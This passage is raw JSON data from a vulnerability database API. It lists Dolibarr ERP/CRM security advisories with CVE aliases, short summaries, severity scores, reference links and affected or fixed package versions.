oring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f768-8pvq-mm6r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/36973?format=json","purl":"pkg:composer/dolibarr/dolibarr@15.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0"},{"url":"http://public2.vulnerablecode.io/api/packages/86726?format=json","purl":"pkg:composer/dolibarr/dolibarr@16.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5r6g-nb9m-43h1"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.0"}],"aliases":["CVE-2022-0414","GHSA-f768-8pvq-mm6r"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fvp2-wtsw-y7ee"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/51787?format=json","vulnerability_id":"VCID-ggum-7ajh-nkdn","sum
mary":"Dolibarr vulnerable to privilege escalation\nDolibarr Open Source ERP & CRM for Business before v14.0.1 allows attackers to escalate privileges via a crafted API.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-43138","reference_id":"","reference_type":"","scores":[{"value":"0.00337","scoring_system":"epss","scoring_elements":"0.56754","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-43138"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-43138","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-43138"},{"reference_url":"https://www.exploit-db.com/exploits/50248","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:
A/M:M/D:R/2025-04-30T14:07:50Z/"}],"url":"https://www.exploit-db.com/exploits/50248"},{"reference_url":"https://github.com/advisories/GHSA-gh7m-j673-wm97","reference_id":"GHSA-gh7m-j673-wm97","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gh7m-j673-wm97"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/85235?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.1"}],"aliases":["CVE-2022-43138","GHSA-gh7m-j673-wm97"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ggum-7a
jh-nkdn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/35730?format=json","vulnerability_id":"VCID-j1fh-3p2s-bfgk","summary":"Cross Site Scripting vulnerability in Dolibarr ERP CRM v.17.0.1 and before allows a remote attacker to obtain sensitive information and execute arbitrary code via the REST API module, related to analyseVarsForSqlAndScriptsInjection and testSqlAndScriptInject.","references":[{"reference_url":"http://dolibarr.com","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:01:54Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38888_Dolibarr_XSS.pdf","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:01:54Z/"}],"url":"https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38888_Dolibarr_XSS.pdf"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-38888","reference_id":"","reference_type":"","scores":[{"value":"0.05006","scoring_system":"epss","scoring_elements":"0.89865","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-38888"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual",
"scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-38888","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-38888"},{"reference_url":"https://github.com/advisories/GHSA-62wf-h26v-5m57","reference_id":"GHSA-62wf-h26v-5m57","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-62wf-h26v-5m57"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67967?format=json","purl":"pkg:composer/dolibarr/dolibarr@17.0.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@17.0.1"}],"aliases":["CVE-2023-38888","GHSA-62wf-h26v-5m57"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-j1fh-3p2s-bfgk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/41483?format=json","vulnerability_id":"VCID-j4d1-8q47-uqc4","summary":"XSS in Dolibarr\nDolibarr before 11.0.4 allows 
XSS.","references":[{"reference_url":"http://packetstormsecurity.com/files/157752/Dolibarr-11.0.3-Cross-Site-Scripting.html","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://packetstormsecurity.com/files/157752/Dolibarr-11.0.3-Cross-Site-Scripting.html"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-13094","reference_id":"","reference_type":"","scores":[{"value":"0.01707","scoring_system":"epss","scoring_elements":"0.82629","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-13094"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/11.0.4/ChangeLog","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/11.0.4/ChangeLog"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13094","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13094"},{"reference_url":"https://www.dolibarr.org/dolibarr-erp-crm-11-0-4-maintenance-release-for-branch-11-0-is-available.php","reference_id":"","reference_type":"","scor
es":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.dolibarr.org/dolibarr-erp-crm-11-0-4-maintenance-release-for-branch-11-0-is-available.php"},{"reference_url":"https://github.com/advisories/GHSA-cxvr-r92m-q9hw","reference_id":"GHSA-cxvr-r92m-q9hw","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cxvr-r92m-q9hw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/75137?format=json","purl":"pkg:composer/dolibarr/dolibarr@11.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-8kn4-yfnc-sfaw"},{"vulnerability":"VCID-8q73-qf6x-zyde"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-ssn5-ht3p-3kgh"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-t
qhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.4"}],"aliases":["CVE-2020-13094","GHSA-cxvr-r92m-q9hw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-j4d1-8q47-uqc4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/59059?format=json","vulnerability_id":"VCID-jrxu-cz7p-3uhe","summary":"Dolibarr SQL injection vulnerability\nSQL injection vulnerability in Dolibarr before 7.0.2 allows remote attackers to execute arbitrary SQL commands via vectors involving integer parameters without quotes.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-10094","reference_id":"","reference_type":"","scores":[{"value":"0.73712","scoring_system":"epss","scoring_elements":"0.98839","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-10094"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dol
ibarr/dolibarr/blob/7.0.2/ChangeLog"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/7ade4e37f24d6859987bb9f6232f604325633fdd","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/7ade4e37f24d6859987bb9f6232f604325633fdd"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-10094","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-10094"},{"reference_url":"https://sysdream.com/news/lab/2018-05-21-cve-2018-10094-dolibarr-sql-injection-vulnerability","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://sysdream.com/news/lab/2018-05-21-cve-2018-10094-dolibarr-sql-injection-vulnerability"},{"reference_url":"https://www.exploit-db.com/exploits/44805","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.exploit-db.com/exploits/44805"},{"reference_url":"https://www.exploit-db.com/exploits/44805/","reference_id":"","reference_type":"","scores":[],"url":"https://www.exploit-db.com/exploits/44805/"},{"reference_url":"http://www.openwall.com/lists/oss-security/2018/05/21/1","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC
:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://www.openwall.com/lists/oss-security/2018/05/21/1"},{"reference_url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/44805.txt","reference_id":"CVE-2018-10094","reference_type":"exploit","scores":[],"url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/44805.txt"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112143?format=json","purl":"pkg:composer/dolibarr/dolibarr@7.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-7khd-yhd5-6ydu"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk
"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.2"}],"aliases":["CVE-2018-10094","GHSA-57wj-22w9-wm9r"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jrxu-cz7p-3uhe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/8389?format=json","vulnerability_id":"VCID-kvcg-cuxk-tbbk","summary":"Dolibarr vulnerable to Cross-Site Request Forgery\nIncorrect access control in Dolibarr ERP CRM versions 19.0.0 and before, allows authenticated attackers to steal victim users' session cookies and CSRF protection tokens via user interaction with a crafted web page, leading to account 
takeover.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-31503","reference_id":"","reference_type":"","scores":[{"value":"0.00057","scoring_system":"epss","scoring_elements":"0.18098","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-31503"},{"reference_url":"https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-31503.md","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-08-19T20:05:15Z/"}],"url":"https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-31503.md"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-31503","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-31503"},{"reference_url":"https://github.com/advisories/GHSA-6ppg-rgrg-f573","reference_id":"GHSA-6ppg-rgrg-f573","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6ppg-rgrg-f573"}],"fixed_packages":[],"aliases":["CVE-2024-31503","GHSA-6ppg-rgrg-f573"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VC
ID-kvcg-cuxk-tbbk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/14712?format=json","vulnerability_id":"VCID-m2e3-q7zb-uuhh","summary":"Dolibarr vulnerable to SQL Injection\nVulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection. These vulnerabilities could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in the database through the parameters in /dolibarr/commande/list.php.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-5315","reference_id":"","reference_type":"","scores":[{"value":"0.5717","scoring_system":"epss","scoring_elements":"0.98178","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-5315"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-5315","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-5315"},{"reference_url":"https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dolibarrs-erp-cms","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-05-24T14:11:03Z/"}],"url":"https://www.incibe.es/e
n/incibe-cert/notices/aviso/multiple-vulnerabilities-dolibarrs-erp-cms"},{"reference_url":"https://github.com/advisories/GHSA-q8x7-jc3h-p8xc","reference_id":"GHSA-q8x7-jc3h-p8xc","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q8x7-jc3h-p8xc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/442949?format=json","purl":"pkg:composer/dolibarr/dolibarr@9.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"}